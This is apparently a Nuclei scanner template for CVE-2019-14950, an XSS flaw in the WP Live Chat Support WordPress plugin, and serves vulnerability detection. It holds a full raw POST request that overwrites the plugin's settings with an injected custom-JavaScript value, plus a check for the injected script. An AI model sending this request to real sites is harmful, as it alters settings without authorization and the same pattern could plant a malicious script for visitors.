wp-live-chat-support plugin before 8.0.27 for WordPress contains a reflected cross-site scripting caused by insufficient sanitization in the GDPR page, letting attackers execute arbitrary scripts in the context of the victim's browser, exploit requires victim to visit a malicious page.
PoC代码[已公开]
id: CVE-2019-14950
info:
name: WP Live Chat Support <= 8.0.27 — Stored Cross-Site Scripting
author: daffainfo
severity: medium
description: |
wp-live-chat-support plugin before 8.0.27 for WordPress contains a reflected cross-site scripting caused by insufficient sanitization in the GDPR page, letting attackers execute arbitrary scripts in the context of the victim's browser, exploit requires victim to visit a malicious page.
impact: |
Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
remediation: |
Update to version 8.0.27 or later.
reference:
- https://wordpress.org/plugins/wp-live-chat-support/#developers
- https://blog.sucuri.net/2019/05/persistent-cross-site-scripting-in-wp-live-chat-support-plugin.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-14950
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-14950
cwe-id: CWE-79
epss-score: 0.05959
epss-percentile: 0.90304
cpe: cpe:2.3:a:3cx:live_chat:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: 3cx
product: live_chat
framework: wordpress
publicwww-query: "/wp-content/plugins/wp-live-chat-support"
tags: cve,cve2019,wordpress,wp,wp-plugin,wp-live-chat-support,xss,intrusive,vkev
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
wplc_settings_enabled=1&wplc_require_user_info=1&wplc_user_default_visitor_name=Guest&wplc_user_alternative_text=Please+click+%27Start+Chat%27+to+initiate+a+chat+with+an+agent&wplc_loggedin_user_info=1&wplc_enabled_on_mobile=1&wplc_enable_msg_sound=1&wplc_enable_font_awesome=1&wplc_elem_trigger_action=0&wplc_elem_trigger_type=0&wplc_elem_trigger_id=&wplc_environment=1&wplc_iterations=55&wplc_delay_between_loops=500000&wplc_enable_transcripts=1&wplc_send_transcripts_to=user&wplc_et_email_body=%3C%21DOCTYPE+HTML+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+HTML+4.01+Transitional%2F%2FEN%22+%22http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml4%2Floose.dtd%22%3E%09%09%0D%0A%09%3Chtml%3E%0D%0A%09%0D%0A%09%3Cbody%3E%0D%0A%0D%0A%0D%0A%0D%0A%09%09%3Ctable+id%3D%22%22+border%3D%220%22+cellpadding%3D%220%22+cellspacing%3D%220%22+width%3D%22100%25%22+style%3D%22background-color%3A+%23ec822c%3B%22%3E%0D%0A%09++++%3Ctbody%3E%0D%0A%09++++++%3Ctr%3E%0D%0A%09++++++++%3Ctd+width%3D%22100%25%22+style%3D%22padding%3A+30px+20px+100px+20px%3B%22%3E%0D%0A%09++++++++++%3Ctable+align%3D%22center%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22+style%3D%22border-collapse%3A+separate%3B+max-width%3A600px%3B%22%3E%0D%0A%09++++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++%3Ctd+style%3D%22text-align%3A+center%3B+padding-bottom%3A+20px%3B%22%3E%0D%0A%09++++++++++++++++++%0D%0A%09++++++++++++++++++%3Cp%3E%5Bwplc_et_transcript_header_text%5D%3C%2Fp%3E%0D%0A%09++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++%3C%2Ftable%3E%0D%0A%0D%0A%09++++++++++%3Ctable+id%3D%22%22+align%3D%22center%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22+style%3D%22border-collapse%3A+separate%3B+max-width%3A+600px%3B+font-family%3A+Georgia%2C+serif%3B+font-size%3A+12px%3B+color%3A+rgb%2851%2C+62%2C+72%29%3B+border%3A+0px+solid+rgb%28255%2C+255%2C+255%29%3B+border-radius%3A+10px%3B+background-color%3A+rgb%28255%2C+255%2C+255%29%3B%22%3E%0D%0A%09++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++%3Ctd+class%3D%22sortable-list+ui-sortable%22+style%3D%22padding%3A20px%3B%22%3E%0D%0A%09++++++++++++++++++++%5Bwplc_et_transcript%5D%0D%0A%09++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++%3C%2Ftable%3E%0D%0A%0D%0A%09++++++++++%3Ctable+align%3D%22center%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22+style%3D%22border-collapse%3A+separate%3B+max-width%3A100%25%3B%22%3E%0D%0A%09++++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++%3Ctd+style%3D%22padding%3A20px%3B%22%3E%0D%0A%09++++++++++++++++++%3Ctable+border%3D%220%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22%3E%0D%0A%09++++++++++++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++++++++++%3Ctd+id%3D%22%22+align%3D%22center%22%3E%0D%0A%09+++++++++++++++++++++++++%3Cp%3E%5Bwplc_et_transcript_footer_text%5D%3C%2Fp%3E%0D%0A%09++++++++++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++++++++++%3C%2Ftable%3E%0D%0A%09++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++%3C%2Ftable%3E%0D%0A%09++++++++%3C%2Ftd%3E%0D%0A%09++++++%3C%2Ftr%3E%0D%0A%09++++%3C%2Ftbody%3E%0D%0A%09++%3C%2Ftable%3E%0D%0A%0D%0A%0D%0A%09%09%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%09%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A%09%09%09++&wplc_et_email_header=%3Ca+title%3D%22daffainfo%22+href%3D%22http%3A%2F%2Flocalhost%22+style%3D%22font-family%3A+Arial%2C+Helvetica%2C+sans-serif%3B+font-size%3A+13px%3B+color%3A+%23FFF%3B+font-weight%3A+bold%3B+text-decoration%3A+underline%3B%22%3Edaffainfo%3C%2Fa%3E++&wplc_et_email_footer=%3Cspan+style%3D%27font-family%3A+Arial%2C+Helvetica%2C+sans-serif%3B+font-size%3A+13px%3B+color%3A+%23FFF%3B+font-weight%3A+normal%3B%27%3EThank+you+for+chatting+with+us.+If+you+have+any+questions%2C+please+%3Ca+href%3D%22mailto%3Adaffainfo%40m.com%22+target%3D%22_blank%22+style%3D%22font-family%3A+Arial%2C+Helvetica%2C+sans-serif%3B+font-size%3A+13px%3B+color%3A+%23FFF%3B+font-weight%3A+bold%3B+text-decoration%3A+underline%3B%22%3Econtact+us%3C%2Fa%3E%3C%2Fspan%3E++&wplc_settings_align=2&wplc_redirect_thank_you_url=&wplc_preferred_gif_provider=1&wplc_giphy_api_key=&wplc_tenor_api_key=&wplc_pro_na=Chat+offline.+Leave+a+message&wplc_pro_offline1=We+are+currently+offline.+Please+leave+a+message+and+we%27ll+get+back+to+you+shortly.&wplc_pro_offline2=Sending+message...&wplc_pro_offline3=Thank+you+for+your+message.+We+will+be+in+contact+soon.&wplc_pro_offline_btn=Leave+a+message&wplc_pro_offline_btn_send=Send+message&wplc_pro_chat_email_address=daffainfo%40m.com&wplc_pro_chat_email_offline_subject=&wplc_mail_type=wp_mail&wplc_mail_host=&wplc_mail_port=&wplc_mail_username=daffainfo&wplc_mail_password=daffainfo&wplc_newtheme=theme-2&wplc_theme=theme-default&wplc_settings_bg=cloudy.jpg&wplc_settings_color1=ED832F&wplc_settings_color2=FFFFFF&wplc_settings_color3=EEEEEE&wplc_settings_color4=666666&wplc_pro_fst1=Questions%3F&wplc_pro_fst2=Chat+with+us&wplc_pro_intro=Hello.+Please+input+your+details+so+that+I+may+help+you.&wplc_pro_sst1=Start+Chat&wplc_pro_sst2=Connecting.+Please+be+patient...&wplc_pro_tst1=Reactivating+your+previous+chat...&wplc_welcome_msg=Please+standby+for+an+agent.+While+you+wait+for+the+agent+you+may+type+your+message.&wplc_user_no_answer=There+is+No+Answer.+Please+Try+Again+Later.&wplc_user_enter=Press+ENTER+to+send+your+message&wplc_text_chat_ended=The+chat+has+been+ended+by+the+operator.&wplc_agent_select=&wplc_ban_users_ip=&survey_display=1&wplc_pro_sst1_survey=Or+chat+to+an+agent+now&wplc_pro_sst1e_survey=Chat+ended&wplc_use_node_server=1&wplc_server_location=auto&wplc_node_token_input=9babb8867252d7cbcda4404d5e56239a&wplc_end_point_override=&wplc_new_chat_ringer_count=5&wplc_gdpr_notice_company=daffainfo&wplc_gdpr_notice_retention_purpose=Chat%2FSupport&wplc_gdpr_notice_retention_period=30&wplc_custom_css=&wplc_custom_js=console.log(document.domain)&activate_block=on&wplc_gutenberg_size=2&wplc_gutenberg_logo=https%3A%2F%2Fbleeper.io%2Fapp%2Fassets%2Fimages%2Fwplc_loading.png&wplc_gutenberg_text=Live+Chat&wplc_gutenberg_enable_icon=on&wplc_gutenberg_icon=fa-commenting-o&wplc_custom_html=%09%09++++++++++++%09%3C%21--+Default+HTML+--%3E%0D%0A%3Cdiv+class%3D%22wplc_block%22%3E%0D%0A%09%3Cspan+class%3D%22wplc_block_logo%22%3E%7Bwplc_logo%7D%3C%2Fspan%3E%0D%0A%09%3Cspan+class%3D%22wplc_block_text%22%3E%7Bwplc_text%7D%3C%2Fspan%3E%0D%0A%09%3Cspan+class%3D%22wplc_block_icon%22%3E%7Bwplc_icon%7D%3C%2Fspan%3E%0D%0A%3C%2Fdiv%3E%09%09++++++++++++&wplc_save_settings=Save+Settings
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "wp-live-chat-support", "<script>console.log(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100deaabd5cabff1edde6d7a0c3b801eb15c4cc18d7b24017ae1dd50ebfe3308ac102200e39b74405e98c5f4a70cc3f91471c5b783fdecb3ce4baf631cb77bb7706ce61:922c64590222798bb761d5b6d8e72950